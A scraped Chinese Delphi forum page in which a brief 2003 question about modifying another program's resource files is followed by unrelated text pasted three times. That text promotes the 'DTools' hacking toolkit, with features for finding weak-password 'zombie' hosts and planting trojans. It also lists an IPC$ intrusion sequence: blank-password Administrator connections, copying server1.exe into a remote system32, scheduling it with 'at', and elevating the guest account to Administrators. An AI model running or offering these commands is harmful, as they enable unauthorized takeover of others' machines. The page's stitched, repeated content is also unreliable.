想在自己的程序里将另一程序中的资源文件修改,可以办到吗?

sjtuyjc 2003-10-16 03:48:19
如题

sjtuyjc@sohu.com
...全文
43 回复 打赏 收藏 转发到动态 举报
写回复
用AI写文章
回复
切换为时间正序
请发表友善的回复…
发表回复
软件功能如下:
---------------------------------------------------------------------------------
1. 共享源查找 [为你查找网上的共享源!]
2. 肉鸡查找 [查找一个网段NT,Win2000密码过于简单的主机,还加入了系统版本识别,使用更方便]
3. 远程服务查看 [你可以查看和修改远程的服务,如关闭和启动Telnet,更方便!]
4. 查看隐藏共享 [查看远程计算机的全部共享,包括隐藏的共享也可以查看的到,查看共享更方便]
5. 查看用户组信息 [Win介面的查看远程机子的用户和组的信息,便用更方便!]
6. 开远程的Telnet [直截开启微软自带的Telnet,开Telnet,原来也可以这么简单!]
3. NT消息发送 [向NT的机子发送消息,便用Win介面使用更方便!]
3. IP端口扫描 [有针对性的查看整个网段的某个端口,如冰河端口7626]
4. 端口扫描 [使你更加了解对方主机端口的打开状况]
5. 网卡MAC [快速获取一个网段的 用户名、工作组、对方的网卡MAC地址]
6. 网络状态查看 [知道自己机子打开了什么端口吗?本程序可帮上你的忙!]
7. 主机查询 [知道IP的的所在地?知道某地有哪些IP,本程序可帮上你的忙!]
8. Ping [判断某IP是否和网络连接的好帮手!]
9. 域名<=>IP [知道域名对应的IP,知道IP对应的域名,本程序可以帮助你!]
10. 路由查看 [知道某IP经过的路由?用本程序就可以给你答案!]
11. Finger [Finger能为你查询对方系统的用户信息!]
12. 进程查看 [查看正在运行的软件,查木马还是有一定的帮助的!]
13. 本机IP [在上网的时候,知道自己的IP吗?本程序可以为你办到!]
14. 常用修改 [反恶意网页修改,恢复系统设置等]
19. 查错误代号说明 [不知道51这个代号表示什么错误,查一查就知道了!]
---------------------------------------------------------------------------------

支持的系统:win98/WinMe/win2000/WinXP/WinNT

功能键说明:
Ctrl+'1' ~ '9' 显示指定数字的页面
CtrL+'-' 前一页
CtrL+'+' 后一页

* 在IP1输入框双击鼠标左键转到"主机查询"
* 在IP2输入框双击鼠标左键将把IP2输入框的IP转为IP1输入框的IP!
* 在程序,大部分地方都有右键功能!

===================================
文件组成
===================================
DTools.exe 主要的执行文件
Help.txt 帮助文件
Setup.ini 设置文件
IP.^_^ IP数据文件
*.d99 共享源文件
*.Por 指定扫描的端口文件
DTools SQL是一款啊d网络工具包。 DTools SQL 啊d网络工具包 v2.02 修正版可以用用“IP端口”扫描可以用针对性的查看整个网段的某个打开的软口! 如冰河端口7626,win的共享端口139等 功能键说明: Ctrl+'1' ~ '9' 显示指定数字的页面 CtrL+'-' 前一页 CtrL+'+' 后一页 * 在IP1输入框双击鼠标左键转到"主机查询" * 在IP2输入框双击鼠标左键将把IP2输入框的IP转为IP1输入框的IP! * 在程序,大部分地方都有右键功能! =================================== 文件组成 =================================== DTools.exe 主要的执行文件 Help.txt 帮助文件 Setup.ini 设置文件 IP.^_^ IP数据文件 *.d99 共享源文件 *.Por 指定扫描的端口文件 1. Ping:判断某IP是否和网络连接的好帮手! 2. 共享源查找:为你查找网上的共享源! 3. 常用修改:反恶意网页修改,恢复系统设置等 4. Finger:Finger能为你查询对方系统的用户信息! 5. 端口扫描:使你更加了解对方主机端口的打开状况 6 NT消息发送:向NT的机子发送消息,便用Win介面使用更方便! 7. 路由查看:知道某IP经过的路由?用本程序就可以给你答案! 8. 进程查看:查看正在运行的软件,查木马还是有一定的帮助的! 9. 本机IP:在上网的时候,知道自己的IP吗?本程序可以为你办到! 10. IP端口扫描:有针对性的查看整个网段的某个端口,如冰河端口7626! 11. 网卡MAC:快速获取一个网段的 用户名、工作组、对方的网卡MAC地址 12.查错误代号说明 [不知道51这个代号表示什么错误,查一查就知道了! 13.网络状态查看:知道自己机子打开了什么端口吗?本程序可帮上你的忙! 14.域名<=>IP:知道域名对应的IP,知道IP对应的域名,本程序可以帮助你! 15.远程服务查看:你可以查看和修改远程的服务,如关闭和启动Telnet,更方便! 16.主机查询:知道IP的的所在地?知道某地有哪些IP,本程序可帮上你的忙! 17.查看用户组信息:Win介面的查看远程机子的用户和组的信息,便用更方便! 18.开远程的:Telnet直截开启微软自带的Telnet,开Telnet,原来也可以这么简单! 19.肉鸡查找:查找一个网段NT,Win2000密码过于简单的主机,还加入了系统版本识别,使用更方便 20.查看隐藏共享:查看远程计算机的全部共享,包括隐藏的共享也可以查看的到,查看共享更方便! 一些常用的DOS网络命令 ================================================================== net share abc$=c:\ 将c:盘映射为 abc$ (加了“$”之后为隐藏的共享目录) net share c$ /del 禁止C$共享 net use z: \\*.*.*.*\C$ 把 *.*.*.*(IP) 的共享 C$ 映射为本地的 Z:盘 net use c: /del 删除映射的c盘 net use * /del /y 删除全部 net start 显示本地主机当前服务 net start telnet 启动 Telnet 服务 net start Server 启动 Server 服务 (IPC$ 和共享要靠这个服务) net stop Messenger 停止信使服务(不会在有烦人的Win的弹出广告了)! net stop server 停止Server 服务 (关了这服务,远程的机子就不能查看你的共享和用IPC$入侵) net user 得到本地主机的用户列表 net user guest /active:yes 将停用的guest帐号激活(变为可用) net user guest 888888 把 Guest 帐号的密码改为 888888 net localgroup Administrators guest /add 把 Guest 加到Administrators组(这样你就有了超级权限了) net view \\*.*.*.* 查看指定IP主机上的共享 nbtstat -A *.*.*.* 得到远程主机的NetBIOS用户名列表 net share 查看本地主机的共享源(本地的默认共享也可以看到) net use \\*.*.*.*\ipc$ "" /user:"" 建立空连接 telnet *.*.*.* 90 连接对方机子的telnet,端口为90 ipconfig 查看本机的IP信息 入侵ipc过程序命令 ----------------------------------------------- net use \\*.*.*.*\ipc$ "" /user:"Administrator" 建立用户名为 Administrator 密码为空的连接 copy server1.exe \\*.*.*.*\Admin$\system32 即将当前目录下的Server1.exe复制到对方Admin$共享的System32目录内 net time \\*.*.*.* 查看远程主机的当前时间 at \\*.*.*.* 14:00 server1.exe 在对方机子添加一个在 14:00 运行 server1.exe 的任务 netstat [-r] [-s] [-n] [-a] 参数含义: -r 显示本机路由表的内容; -s 显示每个协议的使用状态(包括TCP协议、UDP协议、IP协议); -n 以数字表格形式显示地址和端口; -a 显示所有主机的端口号。 DTools啊D网络工具包 更新说明; * 强加了远程查看和修改服务功能。 * 强加了查看隐藏共享。 * 强加了查看用户和组信息。 * 强加了NT消息发送。 * 强加了远程开Telnet的功能。 * 强加了查错误代号说明。 * 价面作了修改。 * 修正了在IP1不能用快捷建 "Ctrl+C" "Ctrl+V" 等问题! 使复制和粘贴更方便! * 软件介面大小可以自由调整!使用更方便! * "肉鸡查找"增加了识别对方系统版本功能!使"肉对查找"有更体贴的感受! * "木马种植"可以只在对方系统添加命令,而不复制文件!就像远程Telnet这么好用! * 修正了"主机查询"的读取某些追捕数据文件会出错的问题! * "网络状态"的右键菜单加入了"查看所有端口所明",知道你的机子打开端口的说明,一按就全知道! * "路由查看"增加了"显示域名"和"显示对方IP所在地"的功能,了解路由机子的信息更方便! * "共享源查找"增加了"自动保存"! 当下提示:在主机框输入IP将会在全部的IP框加入刚输入的地址!在IP框输入IP也会把IP加入主机框!这样才会减少了复制、粘贴的工作量!
DTools SQL是一款啊d网络工具包。 DTools SQL 啊d网络工具包 v2.02 修正版可以用用“IP端口”扫描可以用针对性的查看整个网段的某个打开的软口! 如冰河端口7626,win的共享端口139等 功能键说明: Ctrl+'1' ~ '9' 显示指定数字的页面 CtrL+'-' 前一页 CtrL+'+' 后一页 * 在IP1输入框双击鼠标左键转到"主机查询" * 在IP2输入框双击鼠标左键将把IP2输入框的IP转为IP1输入框的IP! * 在程序,大部分地方都有右键功能! =================================== 文件组成 =================================== DTools.exe 主要的执行文件 Help.txt 帮助文件 Setup.ini 设置文件 IP.^_^ IP数据文件 *.d99 共享源文件 *.Por 指定扫描的端口文件 1. Ping:判断某IP是否和网络连接的好帮手! 2. 共享源查找:为你查找网上的共享源! 3. 常用修改:反恶意网页修改,恢复系统设置等 4. Finger:Finger能为你查询对方系统的用户信息! 5. 端口扫描:使你更加了解对方主机端口的打开状况 6 NT消息发送:向NT的机子发送消息,便用Win介面使用更方便! 7. 路由查看:知道某IP经过的路由?用本程序就可以给你答案! 8. 进程查看:查看正在运行的软件,查木马还是有一定的帮助的! 9. 本机IP:在上网的时候,知道自己的IP吗?本程序可以为你办到! 10. IP端口扫描:有针对性的查看整个网段的某个端口,如冰河端口7626! 11. 网卡MAC:快速获取一个网段的 用户名、工作组、对方的网卡MAC地址 12.查错误代号说明 [不知道51这个代号表示什么错误,查一查就知道了! 13.网络状态查看:知道自己机子打开了什么端口吗?本程序可帮上你的忙! 14.域名<=>IP:知道域名对应的IP,知道IP对应的域名,本程序可以帮助你! 15.远程服务查看:你可以查看和修改远程的服务,如关闭和启动Telnet,更方便! 16.主机查询:知道IP的的所在地?知道某地有哪些IP,本程序可帮上你的忙! 17.查看用户组信息:Win介面的查看远程机子的用户和组的信息,便用更方便! 18.开远程的:Telnet直截开启微软自带的Telnet,开Telnet,原来也可以这么简单! 19.肉鸡查找:查找一个网段NT,Win2000密码过于简单的主机,还加入了系统版本识别,使用更方便 20.查看隐藏共享:查看远程计算机的全部共享,包括隐藏的共享也可以查看的到,查看共享更方便! 一些常用的DOS网络命令 ================================================================== net share abc$=c:\ 将c:盘映射为 abc$ (加了“$”之后为隐藏的共享目录) net share c$ /del 禁止C$共享 net use z: \\*.*.*.*\C$ 把 *.*.*.*(IP) 的共享 C$ 映射为本地的 Z:盘 net use c: /del 删除映射的c盘 net use * /del /y 删除全部 net start 显示本地主机当前服务 net start telnet 启动 Telnet 服务 net start Server 启动 Server 服务 (IPC$ 和共享要靠这个服务) net stop Messenger 停止信使服务(不会在有烦人的Win的弹出广告了)! net stop server 停止Server 服务 (关了这服务,远程的机子就不能查看你的共享和用IPC$入侵) net user 得到本地主机的用户列表 net user guest /active:yes 将停用的guest帐号激活(变为可用) net user guest 888888 把 Guest 帐号的密码改为 888888 net localgroup Administrators guest /add 把 Guest 加到Administrators组(这样你就有了超级权限了) net view \\*.*.*.* 查看指定IP主机上的共享 nbtstat -A *.*.*.* 得到远程主机的NetBIOS用户名列表 net share 查看本地主机的共享源(本地的默认共享也可以看到) net use \\*.*.*.*\ipc$ "" /user:"" 建立空连接 telnet *.*.*.* 90 连接对方机子的telnet,端口为90 ipconfig 查看本机的IP信息 入侵ipc过程序命令 ----------------------------------------------- net use \\*.*.*.*\ipc$ "" /user:"Administrator" 建立用户名为 Administrator 密码为空的连接 copy server1.exe \\*.*.*.*\Admin$\system32 即将当前目录下的Server1.exe复制到对方Admin$共享的System32目录内 net time \\*.*.*.* 查看远程主机的当前时间 at \\*.*.*.* 14:00 server1.exe 在对方机子添加一个在 14:00 运行 server1.exe 的任务 netstat [-r] [-s] [-n] [-a] 参数含义: -r 显示本机路由表的内容; -s 显示每个协议的使用状态(包括TCP协议、UDP协议、IP协议); -n 以数字表格形式显示地址和端口; -a 显示所有主机的端口号。 DTools啊D网络工具包 更新说明; * 强加了远程查看和修改服务功能。 * 强加了查看隐藏共享。 * 强加了查看用户和组信息。 * 强加了NT消息发送。 * 强加了远程开Telnet的功能。 * 强加了查错误代号说明。 * 价面作了修改。 * 修正了在IP1不能用快捷建 "Ctrl+C" "Ctrl+V" 等问题! 使复制和粘贴更方便! * 软件介面大小可以自由调整!使用更方便! * "肉鸡查找"增加了识别对方系统版本功能!使"肉对查找"有更体贴的感受! * "木马种植"可以只在对方系统添加命令,而不复制文件!就像远程Telnet这么好用! * 修正了"主机查询"的读取某些追捕数据文件会出错的问题! * "网络状态"的右键菜单加入了"查看所有端口所明",知道你的机子打开端口的说明,一按就全知道! * "路由查看"增加了"显示域名"和"显示对方IP所在地"的功能,了解路由机子的信息更方便! * "共享源查找"增加了"自动保存"! 当下提示:在主机框输入IP将会在全部的IP框加入刚输入的地址!在IP框输入IP也会把IP加入主机框!这样才会减少了复制、粘贴的工作量!
啊d网络工具包是可以用用“IP端口”扫描可以用针对性的查看整个网段的某个打开的软口!如冰河端口7626,win的共享端口139等 功能键说明: Ctrl+'1' ~ '9' 显示指定数字的页面 CtrL+'-' 前一页 CtrL+'+' 后一页 * 在IP1输入框双击鼠标左键转到"主机查询" * 在IP2输入框双击鼠标左键将把IP2输入框的IP转为IP1输入框的IP! * 在程序,大部分地方都有右键功能! =================================== 文件组成 =================================== DTools.exe 主要的执行文件 Help.txt 帮助文件 Setup.ini 设置文件 IP.^_^ IP数据文件 *.d99 共享源文件 *.Por 指定扫描的端口文件 1. Ping:判断某IP是否和网络连接的好帮手! 2. 共享源查找:为你查找网上的共享源! 3. 常用修改:反恶意网页修改,恢复系统设置等 4. Finger:Finger能为你查询对方系统的用户信息! 5. 端口扫描:使你更加了解对方主机端口的打开状况 6 NT消息发送:向NT的机子发送消息,便用Win介面使用更方便! 7. 路由查看:知道某IP经过的路由?用本程序就可以给你答案! 8. 进程查看:查看正在运行的软件,查木马还是有一定的帮助的! 9. 本机IP:在上网的时候,知道自己的IP吗?本程序可以为你办到! 10. IP端口扫描:有针对性的查看整个网段的某个端口,如冰河端口7626! 11. 网卡MAC:快速获取一个网段的 用户名、工作组、对方的网卡MAC地址 12.查错误代号说明 [不知道51这个代号表示什么错误,查一查就知道了! 13.网络状态查看:知道自己机子打开了什么端口吗?本程序可帮上你的忙! 14.域名<=>IP:知道域名对应的IP,知道IP对应的域名,本程序可以帮助你! 15.远程服务查看:你可以查看和修改远程的服务,如关闭和启动Telnet,更方便! 16.主机查询:知道IP的的所在地?知道某地有哪些IP,本程序可帮上你的忙! 17.查看用户组信息:Win介面的查看远程机子的用户和组的信息,便用更方便! 18.开远程的:Telnet直截开启微软自带的Telnet,开Telnet,原来也可以这么简单! 19.肉鸡查找:查找一个网段NT,Win2000密码过于简单的主机,还加入了系统版本识别,使用更方便 20.查看隐藏共享:查看远程计算机的全部共享,包括隐藏的共享也可以查看的到,查看共享更方便! 一些常用的DOS网络命令 ================================================================== net share abc$=c:\ 将c:盘映射为 abc$ (加了“$”之后为隐藏的共享目录) net share c$ /del 禁止C$共享 net use z: \\*.*.*.*\C$ 把 *.*.*.*(IP) 的共享 C$ 映射为本地的 Z:盘 net use c: /del 删除映射的c盘 net use * /del /y 删除全部 net start 显示本地主机当前服务 net start telnet 启动 Telnet 服务 net start Server 启动 Server 服务 (IPC$ 和共享要靠这个服务) net stop Messenger 停止信使服务(不会在有烦人的Win的弹出广告了)! net stop server 停止Server 服务 (关了这服务,远程的机子就不能查看你的共享和用IPC$入侵) net user 得到本地主机的用户列表 net user guest /active:yes 将停用的guest帐号激活(变为可用) net user guest 888888 把 Guest 帐号的密码改为 888888 net localgroup Administrators guest /add 把 Guest 加到Administrators组(这样你就有了超级权限了) net view \\*.*.*.* 查看指定IP主机上的共享 nbtstat -A *.*.*.* 得到远程主机的NetBIOS用户名列表 net share 查看本地主机的共享源(本地的默认共享也可以看到) net use \\*.*.*.*\ipc$ "" /user:"" 建立空连接 telnet *.*.*.* 90 连接对方机子的telnet,端口为90 ipconfig 查看本机的IP信息 入侵ipc过程序命令 ----------------------------------------------- net use \\*.*.*.*\ipc$ "" /user:"Administrator" 建立用户名为 Administrator 密码为空的连接 copy server1.exe \\*.*.*.*\Admin$\system32 即将当前目录下的Server1.exe复制到对方Admin$共享的System32目录内 net time \\*.*.*.* 查看远程主机的当前时间 at \\*.*.*.* 14:00 server1.exe 在对方机子添加一个在 14:00 运行 server1.exe 的任务 netstat [-r] [-s] [-n] [-a] 参数含义: -r 显示本机路由表的内容; -s 显示每个协议的使用状态(包括TCP协议、UDP协议、IP协议); -n 以数字表格形式显示地址和端口; -a 显示所有主机的端口号。 DTools啊D网络工具包 更新说明; * 强加了远程查看和修改服务功能。 * 强加了查看隐藏共享。 * 强加了查看用户和组信息。 * 强加了NT消息发送。 * 强加了远程开Telnet的功能。 * 强加了查错误代号说明。 * 价面作了修改。 * 修正了在IP1不能用快捷建 "Ctrl+C" "Ctrl+V" 等问题! 使复制和粘贴更方便! * 软件介面大小可以自由调整!使用更方便! * "肉鸡查找"增加了识别对方系统版本功能!使"肉对查找"有更体贴的感受! * "木马种植"可以只在对方系统添加命令,而不复制文件!就像远程Telnet这么好用! * 修正了"主机查询"的读取某些追捕数据文件会出错的问题! * "网络状态"的右键菜单加入了"查看所有端口所明",知道你的机子打开端口的说明,一按就全知道! * "路由查看"增加了"显示域名"和"显示对方IP所在地"的功能,了解路由机子的信息更方便! * "共享源查找"增加了"自动保存"!

5,379

社区成员

发帖
与我相关
我的任务
社区描述
Delphi 开发及应用
社区管理员
  • VCL组件开发及应用社区
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧